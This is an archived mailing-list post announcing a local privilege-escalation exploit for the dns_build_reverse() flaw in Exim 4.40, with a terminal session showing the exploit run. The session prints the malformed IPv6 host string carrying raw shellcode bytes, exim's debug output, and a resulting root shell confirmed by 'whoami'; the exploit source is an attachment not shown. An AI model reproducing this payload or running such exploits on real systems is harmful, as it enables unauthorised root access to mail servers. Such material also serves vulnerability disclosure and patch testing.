<<< Date Index >>>     <<< Thread Index >>>

exim 4.40 exploit



hello punters,

i was bored last night so I coded up a local exploit of the
dns_build_reverse() vulnerability in exim 4.40. hope noone
minds as it was disclosed 5 months ago.
tested on exim 4.40 default build with runtime user as root
rather than exim or mail - hence the rootshell. see below
for versions and system details. "exploit" attached.

regards
plug

============
the details
============

plug@bug:~$ uname -a
Linux bug 2.6.8-2-686 #1 Mon Jan 24 03:58:38 EST 2005 i686
GNU/Linux
plug@bug:~$ /usr/exim/bin/exim -bV
Exim version 4.40 #1 built 23-May-2005 22:31:34
Copyright (c) University of Cambridge 2004
Berkeley DB: Sleepycat Software: Berkeley DB 4.2.52:
(December  3, 2003)
Support for: iconv()
Lookups: lsearch wildlsearch nwildlsearch iplsearch dbm
dbmnz
Authenticators:
Routers: accept dnslookup ipliteral manualroute queryprogram
redirect
Transports: appendfile autoreply pipe smtp
Fixed never_users: 0
Configuration file is /usr/exim/configure
plug@bug:~$
plug@bug:~$
plug@bug:~$ ./exim-exploit
Firing up exim - cross your fingers for shell!

**** SMTP testing session as if from host
::%A:::::::::::::::::1ÀFF  V

      ° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿
**** but without any ident (RFC 1413) callback.
       ó
**** This is not for real!

>>> host in host_lookup? yes (matched "*")
>>> looking up host name for ::%A:::::::::::::::::1ÀFF  V
                                                      °
NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿
>>> IP address lookup using gethostbyaddr()            ó
>>> IP address lookup failed: h_errno=1
LOG: no host name found for IP address
::%A:::::::::::::::::1ÀFF  V

   ° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿
sh-2.05b#
    ó
sh-2.05b#
sh-2.05b#
sh-2.05b# whoami
root
sh-2.05b#
sh-2.05b# exit
exit
plug@bug:~$

Attachment: exim-exploit.c
Description: Binary data